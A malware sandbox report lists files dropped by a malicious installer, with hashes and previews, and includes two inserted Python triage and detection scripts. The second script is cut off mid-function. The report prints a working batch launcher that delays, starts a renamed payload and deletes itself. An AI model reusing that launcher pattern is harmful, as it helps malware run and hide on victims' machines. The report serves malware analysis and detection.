                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):98304
                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1117504
                                                                                                                      Entropy (8bit):6.484489639550344
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:96KyJqotyEbjgE3pr9CxKoibHCMm7HH4d5+u+Tx5KzEKrbsUT1wZS:d+qotJCxKoibHCNbH4d5+u+Tx5KzEKrP
                                                                                                                      MD5:C04ED00DDCB3518E8CF6DB24DB294A50
                                                                                                                      SHA1:CC98CC3AB9C4371F85EA227D9F761BAB4AA76BAA
                                                                                                                      SHA-256:3C21E1F3BB3EBEB5F0FF68658DB8ABD18B62F8B195288C4BF87936FC51F8AE9E
                                                                                                                      SHA-512:736946A3130F294878EA51145960017BABCC1B8AC2C96AFD8B9E2A4D120F173AFB84BBD04B6F0113F286D4BC671BEFECD4E92C582F1DE1A0D5BC8738C3CAE9C5
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):726840
                                                                                                                      Entropy (8bit):6.453439210931193
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:jn6hflHZVr6xVYUiONE4i1uDiSNrETsc4UYK/DAt5c1+vn2eFzLT:mUTxipSxETsNV35c8vn2mzLT
                                                                                                                      MD5:EB7811666AC7BE6477E23AF68511424F
                                                                                                                      SHA1:1623579C5A3710DCC694A2FD49DEFA27D56D9175
                                                                                                                      SHA-256:AD706739B04256B9215E80D2D030863A37F0D7FD0E4071D0A3A73D6704D8BD8F
                                                                                                                      SHA-512:3055BAA15C92F476513C66A423043DC4B8C5F83F47643AD77665D6A2F823F4655BF4AE241D8AF4BC34D53630DF1C35989F0B11B934A631960668FCC7A8C81A7B
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):726840
                                                                                                                      Entropy (8bit):6.453439210931193
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:jn6hflHZVr6xVYUiONE4i1uDiSNrETsc4UYK/DAt5c1+vn2eFzLT:mUTxipSxETsNV35c8vn2mzLT
                                                                                                                      MD5:EB7811666AC7BE6477E23AF68511424F
                                                                                                                      SHA1:1623579C5A3710DCC694A2FD49DEFA27D56D9175
                                                                                                                      SHA-256:AD706739B04256B9215E80D2D030863A37F0D7FD0E4071D0A3A73D6704D8BD8F
                                                                                                                      SHA-512:3055BAA15C92F476513C66A423043DC4B8C5F83F47643AD77665D6A2F823F4655BF4AE241D8AF4BC34D53630DF1C35989F0B11B934A631960668FCC7A8C81A7B
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1117504
                                                                                                                      Entropy (8bit):6.484489639550344
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:96KyJqotyEbjgE3pr9CxKoibHCMm7HH4d5+u+Tx5KzEKrbsUT1wZS:d+qotJCxKoibHCNbH4d5+u+Tx5KzEKrP
                                                                                                                      MD5:C04ED00DDCB3518E8CF6DB24DB294A50
                                                                                                                      SHA1:CC98CC3AB9C4371F85EA227D9F761BAB4AA76BAA
                                                                                                                      SHA-256:3C21E1F3BB3EBEB5F0FF68658DB8ABD18B62F8B195288C4BF87936FC51F8AE9E
                                                                                                                      SHA-512:736946A3130F294878EA51145960017BABCC1B8AC2C96AFD8B9E2A4D120F173AFB84BBD04B6F0113F286D4BC671BEFECD4E92C582F1DE1A0D5BC8738C3CAE9C5
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\Desktop\gorkmTnChA.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5973672
                                                                                                                      Entropy (8bit):7.301554910776435
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:IrvLO010gIuekBbIAAvoTeU0q4ekVbu8sGL3sY5eVrPL3NeJm6Nib:ELO0Ejc4egHsu8Y5e3km6Ns
                                                                                                                      MD5:8A0591A6B534E32FA179F2D781B79026
                                                                                                                      SHA1:61E1AFF6F862CBCE0E1F6E9E70D186E5013D9846
                                                                                                                      SHA-256:4DF8350850592B587C4D2AAABDDC8454BC4652DF0082B85C3336139A9C6EA53E
                                                                                                                      SHA-512:0A261AFD07A152E0F4E7D4DF8AD0D57C53E9690B0B4F7ED13614B60C55466BAFA7AC70472F6B1B5B41E49B249F080AD3C4D440B655B631B17C3C7E1CEA3055BD
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}..O...O...O..6=...O..6=..^O..6=...O..Z3...O..Z3...O..Z3..O..6=...O..6=...O..6=...O...O...M..<2..N..<2...O...O...O..<2...O..Rich.O..........PE..L.....od.........."....#..%..........h........%...@..........................@5.......[...@.................................L...(...../...............[.......2.....H.(.p.....................(.....P.&.@.............%......}..`....................text.....%.......%................. ..`.rdata..2.....%.......%.............@..@.data............:..................@....rsrc........./.....................@..@.reloc........2.......1.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):25
                                                                                                                      Entropy (8bit):4.0536606896881855
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:X+EEy+X:Odn
                                                                                                                      MD5:81FA203DC73EFBDB4CE97F240349F9C6
                                                                                                                      SHA1:D7F82D77CD282504483C33DE4B4CA276FCF2DFB6
                                                                                                                      SHA-256:3F620ED5E52BDFE1388805786CF28CAF97A1509CFDDC9B088E0762CFF189855E
                                                                                                                      SHA-512:A04B75CA8ACFFAF7ADA51A80E7EB290911F6D4CC06A02873D317288D985A0CC3F2E2C18C44A8B75A05D42DADF59758C0CE0CB270972C16A9D004B66E8B6822A3
                                                                                                                      Malicious:false
                                                                                                                      Preview:5VurYdYlrKKnxEbBViqZlWuNr
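The identification fields repeated for every dropped file above (Size, Entropy (8bit), MD5, SHA1, SHA-256, SHA-512) are what an analyst uses to match a file recovered from a victim disk against this report, regardless of the random filename it was dropped under. The following is an added example, not part of the Joe Sandbox report, that recomputes those fields and checks them against the report's values. The only sample input is the 25-byte "ASCII text, with no line terminators" file directly above, whose full content is visible in its Preview; the comparison tolerance and the field names used in the dictionaries are this example's own choices.

```python
"""Added example (not part of the Joe Sandbox report): recompute the per-file
triage fields the report lists (size, 8-bit Shannon entropy, MD5/SHA1/SHA-256/
SHA-512) so a dropped file recovered from disk can be matched against the
report without trusting its filename."""
import hashlib
import math
from collections import Counter

# Content of the 25-byte "ASCII text, with no line terminators" dropped file,
# constructed here from the report's Preview field (all 25 bytes are printable).
DROPPED_TEXT_FILE = b"5VurYdYlrKKnxEbBViqZlWuNr"


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, i.e. the report's 'Entropy (8bit)' field.
    0.0 for a constant file, 8.0 for uniformly random bytes; packed or encrypted
    PE payloads typically sit above roughly 7.2, plain text around 4 to 5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage_fields(data: bytes) -> dict:
    """Return the same identification fields the report lists for a dropped file."""
    return {
        "size": len(data),
        "entropy": shannon_entropy_8bit(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def matches_report(data: bytes, reported: dict, entropy_tolerance: float = 1e-9) -> bool:
    """True when every field given in `reported` agrees with the recomputed one.
    Hashes are compared case-insensitively; entropy is compared with a tolerance
    because the report prints a float. Fields this script does not recompute
    (for example SSDEEP) are skipped."""
    actual = triage_fields(data)
    for key, want in reported.items():
        if key not in actual:
            continue
        have = actual[key]
        if key == "entropy":
            if abs(have - float(want)) > entropy_tolerance:
                return False
        elif key == "size":
            if int(want) != have:
                return False
        elif str(want).upper() != have:
            return False
    return True


# Values copied from the report record for the 25-byte text file.
REPORTED_TEXT_FILE = {
    "size": 25,
    "entropy": 4.0536606896881855,
    "md5": "81FA203DC73EFBDB4CE97F240349F9C6",
    "sha256": "3F620ED5E52BDFE1388805786CF28CAF97A1509CFDDC9B088E0762CFF189855E",
}

if __name__ == "__main__":
    for name, value in triage_fields(DROPPED_TEXT_FILE).items():
        print(f"{name}: {value}")
    print("matches report:", matches_report(DROPPED_TEXT_FILE, REPORTED_TEXT_FILE))
```

Run it against a file pulled from disk (`triage_fields(open(path, "rb").read())`) and compare with the record for the path in question; a size or hash mismatch means a different build of the payload, while a matching SHA-256 with a different filename is the usual outcome, since the DCRat dropper randomises the names it writes under Program Files.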
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5038592
                                                                                                                      Entropy (8bit):6.043058205786219
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                                                                                                                      MD5:11F7419009AF2874C4B0E4505D185D79
                                                                                                                      SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                                                                                                                      SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                                                                                                                      SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L*......N*.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):250
                                                                                                                      Entropy (8bit):5.238787771219104
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:hCijTg3Nou1SV+DEi4/eWU/ZGvKOZG1wkn23fuK:HTg9uYDEi4/eD/oDfmK
                                                                                                                      MD5:C3263AA17EB043CD892AE8BA5306CAE8
                                                                                                                      SHA1:B4D29EF13337A3CD6EFB750838648955FC04DA6C
                                                                                                                      SHA-256:9092CE341A143E404E65E8187F6A71894CFDA6DA12926B4D32F63DF1AB3A38CD
                                                                                                                      SHA-512:B9B68D3E1E98D2DBB71C2A7E32E45B3C9E334FCC7FD8D1285705177A9F74B77AD4F71A4510F9F7787206ED4D515631F60B23CA8482D54492EF427108FD90786F
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\uMu0Nxwczl.bat"
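The 250-byte batch file above is the launcher stub of the dropper: it uses `w32tm /stripchart` against localhost as a short delay, starts the renamed payload from a locale folder under Program Files with `start ""`, and then deletes itself from the Temp directory. The following is an added example, not part of the Joe Sandbox report, that recovers the script's lines from the report's Preview (the report renders each non-printable byte as `.`, so a CR/LF pair appears as `..`) and applies a small rule set to that three-step shape. The rule names, the `ping`/`timeout` alternatives in the delay rule and the resource-folder heuristic are this example's own choices, not findings of the report.

```python
"""Added example, not part of the Joe Sandbox report: flag the
'delay, launch renamed payload, self-delete' shape of the dropped batch file.
Input is that batch script, rebuilt from the report's Preview field."""
import re
from typing import List, Tuple

# Preview text copied from the report record; '..' marks each CR/LF pair.
BATCH_PREVIEW = (
    '@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 '
    '/dataonly /samples:2 > nul..start "" "C:\\Program Files\\Windows NT\\'
    'Accessories\\en-GB\\KAdpNCgonFhCnlBRasdZerWl.exe"..del /a /q /f '
    '"C:\\Users\\user\\AppData\\Local\\Temp\\\\uMu0Nxwczl.bat"'
)


def lines_from_preview(preview: str) -> List[str]:
    """Joe Sandbox prints every non-printable byte as '.', so CRLF shows up as '..'.
    In this preview '..' occurs only at line ends, so splitting on it recovers the
    lines; a script containing a literal '..' would need the raw bytes instead."""
    return [ln for ln in preview.split("..") if ln]


# Commands commonly abused as a sleep so the launch happens after the dropper exits
# (w32tm /stripchart is what this sample uses; ping -n and timeout /t are the
# other well-known substitutes).
DELAY_RE = re.compile(r"^(w32tm\s+/stripchart|ping\s+-n\s+\d+|timeout\s+/t\s+\d+)", re.I)
# start "" "<path>.exe": detach an executable with an empty window title.
START_RE = re.compile(r'^start\s+""\s+"([^"]+\.exe)"', re.I)
# del of a .bat under a Temp directory: the script removing itself.
SELFDEL_RE = re.compile(r'^del\s+(?:/\w\s+)*"([^"]*\\Temp\\+[^"\\]+\.bat)"', re.I)
# Heuristic (this example's own): an .exe inside a locale folder such as en-GB
# under Program Files, where legitimate installs keep resources, not binaries.
ODD_LOCATION_RE = re.compile(
    r"^[A-Z]:\\Program Files( \(x86\))?\\.*\\[a-z]{2}-[A-Z]{2}\\[^\\]+\.exe$"
)


def scan_batch(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (rule, evidence) pairs, in script order, for each matching line."""
    findings: List[Tuple[str, str]] = []
    for raw in lines:
        ln = raw.strip()
        if DELAY_RE.match(ln):
            findings.append(("delay_before_launch", ln))
        m = START_RE.match(ln)
        if m:
            exe = m.group(1)
            findings.append(("detached_exe_launch", exe))
            if ODD_LOCATION_RE.match(exe):
                findings.append(("exe_in_resource_folder", exe))
        m = SELFDEL_RE.match(ln)
        if m:
            findings.append(("temp_bat_self_delete", m.group(1)))
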